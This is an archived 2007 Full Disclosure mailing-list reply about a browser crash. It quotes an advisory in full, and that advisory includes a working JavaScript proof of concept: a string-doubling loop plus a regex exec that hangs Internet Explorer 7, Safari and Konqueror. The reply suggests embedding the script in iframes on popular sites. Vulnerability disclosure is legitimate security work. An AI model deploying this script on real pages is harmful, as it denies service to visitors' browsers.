Full Disclosure mailing list archives
Re: Internet Explorer Crash
From: Kradorex Xeron <admin () digibase ca>
Date: Wed, 18 Apr 2007 12:31:57 -0400
This also works under Konqueror. There should be an implimentation on ALL browsers that a loop such large is unacceptable and refuse to even run it. There is no viable reason for a client-side to run a loop through so many itterations. This DoS technique could be abused and iframes with the code could be embedded within popular websites, effectively causing a denial of service to that specific site. On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
Product: Internet Explorer Version 7.0.5730.11 Impact: Browser crash possibly more Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Why bother? Who doesn't know what Internet Explorer and Microsoft are. II. DESCRIPTION IE 7 is vulnerable to a script which causes the browser to hang. The memory and CPU usage go through the roof. Originally the script caused (and still causes) Safari and Konqueror to crash. III SOLUTION Stop using Microsoft products or deal with a new advisory every other day. IV. Proof http://www.infiltrated.net/stupidInternetExploder.html V. Code $ more /stupidInternetExploder.html <script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 999999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999999999999 9999999 999999999999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999999999999 9999999 999999999999999999999999999999999999999999999999999999999999999999999999999 9999999999999999999999999999999999999999999999999999999999999999999999999999 9999999 999999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999) z+=z; var boum = reg.exec(z); </script> Goodbye J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer Crash J. Oquendo (Apr 17)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Re: Internet Explorer Crash Michal Majchrowicz (Apr 17)
- Re: Internet Explorer Crash Troy (Apr 17)
- Re: Internet Explorer Crash Kradorex Xeron (Apr 18)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Pavel Kankovsky (Apr 21)
- Re: Internet Explorer Crash cardoso (Apr 21)
- Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
- Message not available
- Re: Internet Explorer Crash Michele Cicciotti (Apr 18)
- <Possible follow-ups>
- Internet Explorer Crash carl hardwick (Apr 17)
- Re: Internet Explorer Crash 3APA3A (Apr 17)
- Re: Internet Explorer Crash Dr. Neal Krawetz, PhD (Apr 17)